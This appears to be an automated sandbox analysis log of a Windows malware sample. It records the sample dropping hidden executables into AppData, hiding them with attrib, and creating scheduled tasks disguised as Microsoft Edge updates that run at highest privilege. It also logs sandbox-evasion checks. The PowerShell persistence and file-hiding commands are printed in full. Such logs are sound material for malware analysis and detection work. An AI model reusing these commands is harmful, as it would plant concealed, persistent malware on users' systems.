Source: C:\Users\user\AppData\SystemUpdate.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\$Windows.~WS\Sources\SetupHost.exe | API coverage: 9.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484 | Thread sleep count: 7058 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488 | Thread sleep count: 2548 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep count: 8223 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 | Thread sleep count: 1097 > 30
Source: C:\$Windows.~WS\Sources\SetupHost.exe TID: 7916 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\WinHex.exe TID: 2000 | Thread sleep count: 255 > 30
Source: C:\Users\user\AppData\WinHex.exe TID: 4520 | Thread sleep count: 732 > 30
Source: C:\Windows\System32\svchost.exe TID: 7140 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\$Windows.~WS\Sources\SetupHost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_bios
Source: C:\$Windows.~WS\Sources\SetupHost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\$Windows.~WS\Sources\SetupHost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Name, Caption, Architecture, MaxClockSpeed FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (19 occurrences)
Source: C:\Users\user\AppData\WinHex.exe | Last function: Thread delayed (2 occurrences)
Source: C:\Users\user\AppData\WinHex.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6746714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError (2 occurrences)
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6737820 FindFirstFileExW,FindClose
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A67509B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE6714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError (2 occurrences)
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BD7820 FindFirstFileExW,FindClose
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF09B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_004FFD75 memset,SetLastError,GetLastError,FindFirstFileW,memset,wcsrchr,SetLastError,SetLastError,CompareStringW,CompareStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,memset,FindNextFileW,GetLastError,GetLastError,GetLastError,FindClose,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SetLastError,SetLastError
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00544EA0 FindFirstFileW
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657806714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError (2 occurrences)
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6577F7820 FindFirstFileExW,FindClose
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6578109B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00544D90 GetLogicalDriveStringsW
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0053DC8E GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: SetupHost.exe, 0000000D.00000003.1830014011.000000000336F000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1831757047.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1830551063.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1831757047.000000000336D000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1830551063.0000000003375000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: SetupHost.exe, 0000000D.00000003.1830551063.000000000339E000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1831757047.000000000339E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH|;
Source: SetupHost.exe, 0000000D.00000003.1797347208.000000000339F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A673B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7A673B69C
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0053DE32 __EH_prolog3_GS,memset,memset,memset,memset,memset,RtlGetVersion,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,SetLastError,GetLastError,LoadLibraryW,GetProcAddress,GlobalFree,GetLastError,GetLastError,RegOpenKeyExW,RegCloseKey,CompareStringW,CompareStringW,GetLastError,GetLastError,FreeLibrary,RegCloseKey, 13_2_0053DE32
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_005020B8 mov eax, dword ptr fs:[00000030h] 13_2_005020B8
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_005041C5 mov eax, dword ptr fs:[00000030h] 13_2_005041C5
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0051A1B0 mov eax, dword ptr fs:[00000030h] 13_2_0051A1B0
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0050D284 mov eax, dword ptr fs:[00000030h] 13_2_0050D284
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_005023C9 mov eax, dword ptr fs:[00000030h] 13_2_005023C9
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00501452 mov eax, dword ptr fs:[00000030h] 13_2_00501452
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00502459 mov eax, dword ptr fs:[00000030h] 13_2_00502459
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0051B40B mov eax, dword ptr fs:[00000030h] 13_2_0051B40B
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00502486 mov eax, dword ptr fs:[00000030h] 13_2_00502486
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_005035EB mov eax, dword ptr fs:[00000030h] 13_2_005035EB
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_005015EF mov eax, dword ptr fs:[00000030h] 13_2_005015EF
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00504603 mov eax, dword ptr fs:[00000030h] 13_2_00504603
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_004FF6D6 mov eax, dword ptr fs:[00000030h] 13_2_004FF6D6
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_004FF6D6 mov ecx, dword ptr fs:[00000030h] 13_2_004FF6D6
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_004FF75B mov eax, dword ptr fs:[00000030h] 13_2_004FF75B
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00501774 mov eax, dword ptr fs:[00000030h] 13_2_00501774
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0051F723 mov eax, dword ptr fs:[00000030h] 13_2_0051F723
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0051E7B9 mov eax, dword ptr fs:[00000030h] 13_2_0051E7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00503859 mov eax, dword ptr fs:[00000030h] 13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00503859 mov ecx, dword ptr fs:[00000030h] 13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00503859 mov eax, dword ptr fs:[00000030h] 13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0051F942 mov eax, dword ptr fs:[00000030h] 13_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00502960 mov eax, dword ptr fs:[00000030h] 13_2_00502960
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00501913 mov eax, dword ptr fs:[00000030h] 13_2_00501913
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_005049F4 mov eax, dword ptr fs:[00000030h] 13_2_005049F4
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0051BA64 mov eax, dword ptr fs:[00000030h] 13_2_0051BA64
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_004FFA04 mov eax, dword ptr fs:[00000030h] 13_2_004FFA04
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00504AD3 mov eax, dword ptr fs:[00000030h] 13_2_00504AD3
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0051BACF mov eax, dword ptr fs:[00000030h] 13_2_0051BACF
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00506B97 mov eax, dword ptr fs:[00000030h] 13_2_00506B97
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00502B85 mov eax, dword ptr fs:[00000030h] 13_2_00502B85
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h] 13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00502BB0 mov ecx, dword ptr fs:[00000030h] 13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h] 13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00516BB5 mov eax, dword ptr fs:[00000030h] 13_2_00516BB5
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00501CC2 mov eax, dword ptr fs:[00000030h] 13_2_00501CC2
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00516CC6 mov eax, dword ptr fs:[00000030h] 13_2_00516CC6
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00504CA4 mov eax, dword ptr fs:[00000030h] 13_2_00504CA4
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00500DBA mov eax, dword ptr fs:[00000030h] 13_2_00500DBA
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00504E74 mov eax, dword ptr fs:[00000030h] 13_2_00504E74
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00501E6D mov eax, dword ptr fs:[00000030h] 13_2_00501E6D
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00501E1A mov eax, dword ptr fs:[00000030h] 13_2_00501E1A
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_004FEE2E mov eax, dword ptr fs:[00000030h] 13_2_004FEE2E
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00501EFB mov eax, dword ptr fs:[00000030h] 13_2_00501EFB
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00504F73 mov eax, dword ptr fs:[00000030h] 13_2_00504F73
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A67525A0 GetProcessHeap, 0_2_00007FF7A67525A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A673B880 SetUnhandledExceptionFilter, 0_2_00007FF7A673B880
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A673AE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7A673AE00
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A673B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7A673B69C
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A6749AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7A6749AE4
Source: C:\Users\user\AppData\WinHex.exe Code function: 12_2_00007FF7C5BDB69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF7C5BDB69C
Source: C:\Users\user\AppData\WinHex.exe Code function: 12_2_00007FF7C5BDAE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF7C5BDAE00
Source: C:\Users\user\AppData\WinHex.exe Code function: 12_2_00007FF7C5BDB880 SetUnhandledExceptionFilter, 12_2_00007FF7C5BDB880
Source: C:\Users\user\AppData\WinHex.exe Code function: 12_2_00007FF7C5BE9AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF7C5BE9AE4
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0053F60E memset,memset,memset,memset,memset,memset,memset,memset,GetLastError,GetWindowsDirectoryA,ExpandEnvironmentStringsW,GetFileAttributesW,GetTempPathW,wcsrchr,SetUnhandledExceptionFilter,GetCurrentProcessId,GetLastError,RtlAddVectoredExceptionHandler,RtlAddVectoredExceptionHandler, 13_2_0053F60E
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0054010D SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,TlsFree,TlsGetValue,TlsFree,EnterCriticalSection,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LeaveCriticalSection, 13_2_0054010D
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0054EB2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_0054EB2C
Source: C:\Users\user\AppData\SystemUpdate.exe Code function: 19_2_00007FF6577FB880 SetUnhandledExceptionFilter, 19_2_00007FF6577FB880
Source: C:\Users\user\AppData\SystemUpdate.exe Code function: 19_2_00007FF6577FB69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FF6577FB69C
Source: C:\Users\user\AppData\SystemUpdate.exe Code function: 19_2_00007FF6577FAE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FF6577FAE00
Source: C:\Users\user\AppData\SystemUpdate.exe Code function: 19_2_00007FF657809AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FF657809AE4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Process created: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\LineInst.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\WinHex.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\LineInst.exe Process created: C:\$Windows.~WS\Sources\SetupHost.exe "C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web
Source: C:\Users\user\AppData\WinHex.exe Process created: C:\Users\user\AppData\WinHex.exe C:\Users\user\AppData\Roaming\../WinHex.exe
Source: C:\Users\user\AppData\WinHex.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exe Process created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $action = new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\../lineinst.exe'; $trigger = new-scheduledtasktrigger -once -at (get-date); $principal = new-scheduledtaskprincipal -userid 'user' -logontype interactive -runlevel highest; register-scheduledtask -action $action -trigger $trigger -principal $principal -taskname 'microsoftedgeupdatesonce' -description 'microsoftedgeupdatesonce once' -force; start-scheduledtask -taskname 'microsoftedgeupdatesonce' "
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $action = new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\../winhex.exe'; $trigger = new-scheduledtasktrigger -atlogon; $principal = new-scheduledtaskprincipal -userid 'user' -logontype interactive -runlevel highest; register-scheduledtask -action $action -trigger $trigger -principal $principal -taskname 'microsoftedgeupdatesonceme' -description 'microsoftedgeupdatesonce once you' -force; start-scheduledtask -taskname 'microsoftedgeupdatesonceme' "
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00541F8C InitializeSecurityDescriptor,AllocateAndInitializeSid,AllocateAndInitializeSid,AllocateAndInitializeSid,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,EqualSid,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree, 13_2_00541F8C
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_00501150 AllocateAndInitializeSid,CheckTokenMembership,GetLastError,FreeSid,GetLastError,SetLastError, 13_2_00501150
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A67589B0 cpuid 0_2_00007FF7A67589B0
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: GetLocaleInfoW, 13_2_00545150
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\LineInst.exe VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\SystemUpdate.exe VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
